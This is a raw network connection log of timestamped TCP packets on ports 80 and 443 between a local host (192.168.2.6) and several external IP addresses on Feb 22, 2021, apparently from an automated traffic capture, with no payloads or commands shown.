                                                                                                                                                Feb 22, 2021 23:45:49.377270937 CET49982443192.168.2.6104.244.42.6
                                                                                                                                                Feb 22, 2021 23:45:49.377810955 CET49982443192.168.2.6104.244.42.6
                                                                                                                                                Feb 22, 2021 23:45:49.377840996 CET49982443192.168.2.6104.244.42.6
                                                                                                                                                Feb 22, 2021 23:45:49.380968094 CET49982443192.168.2.6104.244.42.6
                                                                                                                                                Feb 22, 2021 23:45:49.381313086 CET49982443192.168.2.6104.244.42.6
                                                                                                                                                Feb 22, 2021 23:45:49.477132082 CET4998380192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:49.530113935 CET8049983172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:49.533776999 CET4998380192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:49.534487009 CET4998380192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:49.587270975 CET8049983172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:49.962299109 CET8049983172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:49.964279890 CET4998380192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:49.967061043 CET49984443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:50.019943953 CET44349984172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:50.020096064 CET49984443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:50.020716906 CET49984443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:50.073513985 CET44349984172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:50.075607061 CET44349984172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:50.076029062 CET49984443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:50.076580048 CET49984443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:50.081248999 CET49984443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:50.129322052 CET44349984172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:50.134071112 CET44349984172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.126912117 CET44349984172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.126924992 CET44349984172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.126943111 CET44349984172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.126951933 CET44349984172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.126970053 CET44349984172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.126982927 CET44349984172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.126995087 CET44349984172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.127007008 CET44349984172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.127021074 CET44349984172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.127199888 CET49984443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:51.127332926 CET49984443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:51.127866983 CET49984443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:51.127918005 CET49984443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:51.159137964 CET44349984172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.159152031 CET44349984172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.159415960 CET44349984172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.159425974 CET44349984172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.159485102 CET49984443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:51.159631014 CET49984443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:51.159642935 CET49984443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:51.159699917 CET49984443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:51.160037041 CET44349984172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.160052061 CET44349984172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.160181046 CET49984443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:51.161276102 CET44349984172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.161298037 CET44349984172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.161410093 CET49984443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:51.162533998 CET44349984172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.162556887 CET44349984172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.162717104 CET49984443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:51.163849115 CET44349984172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.163870096 CET44349984172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.163978100 CET49984443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:51.165102959 CET44349984172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.165126085 CET44349984172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.165265083 CET49984443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:51.166243076 CET44349984172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.166275024 CET44349984172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.166357994 CET49984443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:51.166474104 CET49984443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:51.167468071 CET44349984172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.167495966 CET44349984172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.167574883 CET49984443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:51.168726921 CET44349984172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.168761015 CET44349984172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.168836117 CET49984443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:51.168921947 CET49984443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:51.169946909 CET44349984172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.169961929 CET44349984172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.170094967 CET49984443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:51.181361914 CET44349984172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.181420088 CET44349984172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.181720018 CET49984443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:51.181916952 CET44349984172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.181945086 CET44349984172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.182079077 CET49984443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:51.183161974 CET44349984172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.183176994 CET44349984172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.183270931 CET49984443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:51.183326960 CET49984443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:51.245333910 CET4997580192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:51.246354103 CET4998580192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:51.313647985 CET80499755.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.313828945 CET4997580192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:51.314799070 CET80499855.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.315069914 CET4998580192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:51.316535950 CET4998580192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:51.384831905 CET80499855.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.385020971 CET80499855.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.385193110 CET4998580192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:51.389518023 CET49986443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:51.457801104 CET443499865.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.457988977 CET49986443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:51.459096909 CET49986443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:51.528661966 CET443499865.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.528706074 CET443499865.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.528836012 CET49986443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:51.529644966 CET49986443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:51.535690069 CET49986443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:51.603923082 CET443499865.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.963574886 CET443499865.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.963613987 CET443499865.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.963639021 CET443499865.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.963663101 CET443499865.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.963682890 CET443499865.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.963706017 CET443499865.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.963726997 CET443499865.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:51.963944912 CET49986443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:51.964663982 CET49986443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:51.971170902 CET4997880192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:45:51.972976923 CET4998780192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:45:52.034131050 CET443499865.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:52.034321070 CET49986443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:52.136746883 CET8049987192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:52.137120962 CET4998780192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:45:52.137571096 CET4998780192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:45:52.140943050 CET8049978192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:52.141020060 CET4997880192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:45:52.300293922 CET8049987192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:52.300318956 CET8049987192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:52.300414085 CET4998780192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:45:52.302902937 CET49979443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:52.304089069 CET49988443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:52.344980001 CET44349988216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:52.346555948 CET49988443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:52.347094059 CET49988443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:52.348248005 CET44349979216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:52.350878954 CET44349979216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:52.352071047 CET49979443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:52.387964010 CET44349988216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:52.399234056 CET44349988216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:52.399276972 CET44349988216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:52.399322987 CET44349988216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:52.403755903 CET49988443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:52.410115957 CET49988443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:52.458218098 CET44349988216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:52.460134983 CET44349988216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:52.460266113 CET49988443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:52.461071014 CET49988443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:52.507153988 CET44349988216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:52.729614019 CET44349988216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:52.729629993 CET44349988216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:52.729646921 CET44349988216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:52.729655981 CET44349988216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:52.729723930 CET49988443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:52.729770899 CET49988443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:52.934740067 CET4998080192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:52.936300993 CET4998980192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:52.992695093 CET8049980104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:52.994304895 CET8049989104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:52.999705076 CET4998080192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:52.999787092 CET4998980192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:53.009038925 CET4998980192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:53.067281961 CET8049989104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:53.174079895 CET8049989104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:53.178580046 CET4998980192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:53.181977034 CET49981443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:53.183211088 CET49990443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:53.239856005 CET44349981104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:53.239929914 CET44349981104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:53.240250111 CET49981443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:53.242405891 CET49981443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:53.243791103 CET44349990104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:53.244168043 CET49990443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:53.245417118 CET49990443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:53.301703930 CET44349990104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:53.303200960 CET44349990104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:53.316380978 CET49990443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:53.319413900 CET49990443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:53.330008030 CET49990443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:53.375791073 CET44349990104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:53.389542103 CET44349990104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:53.491441965 CET44349990104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:53.497708082 CET49990443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:53.505738974 CET49991443192.168.2.6104.244.42.6
                                                                                                                                                Feb 22, 2021 23:45:53.562133074 CET44349991104.244.42.6192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:53.562434912 CET49991443192.168.2.6104.244.42.6
                                                                                                                                                Feb 22, 2021 23:45:53.563575029 CET49991443192.168.2.6104.244.42.6
                                                                                                                                                Feb 22, 2021 23:45:53.621402979 CET44349991104.244.42.6192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:53.621630907 CET44349991104.244.42.6192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:53.641597033 CET49991443192.168.2.6104.244.42.6
                                                                                                                                                Feb 22, 2021 23:45:53.643297911 CET49991443192.168.2.6104.244.42.6
                                                                                                                                                Feb 22, 2021 23:45:53.646984100 CET49991443192.168.2.6104.244.42.6
                                                                                                                                                Feb 22, 2021 23:45:53.701123953 CET44349991104.244.42.6192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:53.704938889 CET44349991104.244.42.6192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:53.835314989 CET44349991104.244.42.6192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:53.835350990 CET44349991104.244.42.6192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:53.835372925 CET44349991104.244.42.6192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:53.835390091 CET44349991104.244.42.6192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:53.835412025 CET44349991104.244.42.6192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:53.835429907 CET44349991104.244.42.6192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:53.835448027 CET44349991104.244.42.6192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:53.835464001 CET44349991104.244.42.6192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:53.835561991 CET44349991104.244.42.6192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:53.845063925 CET49991443192.168.2.6104.244.42.6
                                                                                                                                                Feb 22, 2021 23:45:53.845370054 CET49991443192.168.2.6104.244.42.6
                                                                                                                                                Feb 22, 2021 23:45:53.846338987 CET49991443192.168.2.6104.244.42.6
                                                                                                                                                Feb 22, 2021 23:45:53.846385002 CET49991443192.168.2.6104.244.42.6
                                                                                                                                                Feb 22, 2021 23:45:53.849054098 CET4998380192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:53.850167990 CET4999280192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:53.898783922 CET8049992172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:53.901586056 CET4999280192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:53.902371883 CET4999280192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:53.904830933 CET8049983172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:53.905700922 CET4998380192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:53.949610949 CET8049992172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:54.424356937 CET8049992172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:54.432560921 CET4999280192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:54.438937902 CET49993443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:54.486102104 CET44349993172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:54.495064974 CET49993443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:54.497128010 CET49993443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:54.545622110 CET44349993172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:54.548731089 CET44349993172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:54.552402973 CET49993443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:54.554162979 CET49993443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:54.560281992 CET49993443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:54.601141930 CET44349993172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:54.607312918 CET44349993172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:55.257086992 CET44349993172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:55.257122993 CET44349993172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:55.257143021 CET44349993172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:55.257154942 CET44349993172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:55.257181883 CET44349993172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:55.257200003 CET44349993172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:55.257224083 CET44349993172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:55.257249117 CET44349993172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:55.257278919 CET44349993172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:55.257299900 CET44349993172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:55.257782936 CET44349993172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:55.262324095 CET49993443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:55.282696009 CET49993443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:55.294737101 CET44349993172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:55.294768095 CET44349993172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:55.294914007 CET44349993172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:55.294934034 CET44349993172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:55.295643091 CET44349993172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:55.295670033 CET44349993172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:55.296962976 CET44349993172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:55.296991110 CET44349993172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:55.298309088 CET44349993172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:55.298337936 CET44349993172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:55.299649954 CET44349993172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:55.299681902 CET44349993172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:55.301011086 CET44349993172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:55.301037073 CET44349993172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:55.302340031 CET44349993172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:55.302369118 CET44349993172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:55.303015947 CET49993443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:55.303664923 CET44349993172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:55.303689003 CET44349993172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:55.304987907 CET44349993172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:55.305012941 CET44349993172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:55.309412956 CET44349993172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:55.309442997 CET44349993172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:55.310014963 CET44349993172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:55.310038090 CET44349993172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:55.311399937 CET44349993172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:55.311425924 CET44349993172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:55.312701941 CET44349993172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:55.312721968 CET44349993172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:55.323489904 CET49993443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:55.343807936 CET49993443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:55.364028931 CET49993443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:55.660856009 CET49993443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:55.660897017 CET49993443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:55.774337053 CET4998580192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:55.775338888 CET4999480192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:55.842890978 CET80499855.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:55.843549967 CET80499945.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:55.852525949 CET4998580192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:55.852566957 CET4999480192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:55.855149984 CET4999480192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:55.924299955 CET80499945.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:55.924365044 CET80499945.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:55.940318108 CET4999480192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:55.942159891 CET49995443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:56.013506889 CET443499955.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:56.047466040 CET49995443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:56.048867941 CET49995443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:56.120259047 CET443499955.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:56.120289087 CET443499955.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:56.120491982 CET49995443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:56.120918036 CET49995443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:56.123091936 CET49995443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:56.195626974 CET443499955.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:56.599299908 CET443499955.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:56.599355936 CET443499955.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:56.599395037 CET443499955.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:56.599426985 CET49995443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:56.599433899 CET443499955.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:56.599473000 CET443499955.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:56.599473953 CET49995443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:56.599519968 CET443499955.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:56.599535942 CET49995443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:56.599558115 CET443499955.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:56.599675894 CET49995443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:56.599700928 CET49995443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:56.600038052 CET49995443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:56.600909948 CET4998780192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:45:56.601907015 CET4999680192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:45:56.671089888 CET443499955.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:56.671252966 CET49995443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:56.763835907 CET8049987192.0.84.247192.168.2.6
